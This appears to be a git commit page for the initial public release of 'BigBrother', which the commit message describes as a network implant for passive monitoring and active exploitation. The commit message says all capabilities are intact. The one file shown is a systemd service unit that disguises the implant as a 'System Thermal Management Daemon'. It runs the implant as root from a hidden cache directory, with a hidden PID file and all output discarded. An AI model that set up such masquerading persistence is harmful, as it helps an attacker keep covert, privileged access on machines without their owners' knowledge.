Initial public release

Full BigBrother network implant - passive SOC + active exploitation.
Personal identifiers removed; all capabilities intact.
See README.md for setup and docs/deployment.md for detailed deployment.
This commit is contained in:
n0mad1k
2026-06-26 09:52:50 -04:00
commit ccc6b729de
175 changed files with 47941 additions and 0 deletions
+23
View File
@@ -0,0 +1,23 @@
[Unit]
Description=System Thermal Management Daemon
After=network-online.target
Wants=network-online.target
[Service]
Type=forking
PIDFile=/tmp/.bb.pid
ExecStart=/opt/.cache/bb/.venv/bin/python3 /opt/.cache/bb/bigbrother.py start --daemon
WorkingDirectory=/opt/.cache/bb
Restart=on-failure
RestartSec=10
TimeoutStartSec=60
User=root
StandardOutput=null
StandardError=null
MemoryMax=600M
MemorySwapMax=200M
CPUQuota=200%
OOMScoreAdj=200
[Install]
WantedBy=multi-user.target